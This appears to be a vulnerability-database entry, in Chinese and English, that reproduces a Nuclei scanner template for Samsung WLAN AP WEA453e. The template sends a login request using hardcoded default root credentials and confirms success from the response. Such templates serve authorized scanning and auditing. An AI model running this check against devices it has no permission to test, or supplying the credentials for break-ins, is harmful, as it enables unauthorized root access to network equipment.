samsung-wlan-default-login: Samsung Wlan AP (WEA453e) Default Login

日期: 2025-08-01 | 影响软件: Samsung Wlan | POC: 已公开

漏洞描述

Samsung Wlan AP (WEA453e) default root credentials were discovered.

PoC代码[已公开]

id: samsung-wlan-default-login

info:
  name: Samsung Wlan AP (WEA453e) Default Login
  author: pikpikcu
  severity: high
  description: Samsung Wlan AP (WEA453e) default root credentials were discovered.
  reference:
    - https://securityforeveryone.com/tools/samsung-wlan-ap-wea453e-default-credentials-scanner
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: samsung,default-login,vuln

http:
  - raw:
      - |
        POST /main.ehp HTTP/1.1
        Host: {{Hostname}}

        httpd;General;lang=en&login_id={{username}}&login_pw={{password}}

    payloads:
      username:
        - root
      password:
        - sweap12~
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "document.formParent2.changepasswd1.value"
          - "passwd_change.ehp"

      - type: status
        status:
          - 200
# digest: 490a0046304402200af63f33627a572b625bf2befcb90aaa1c3c1cd3a03cf3f65239a3b9d67325970220276ae4b550c38a56d213f7556bc8a7130b114d340c5920fb9f9a2b7bcc7ed7c4:922c64590222798bb761d5b6d8e72950

相关漏洞推荐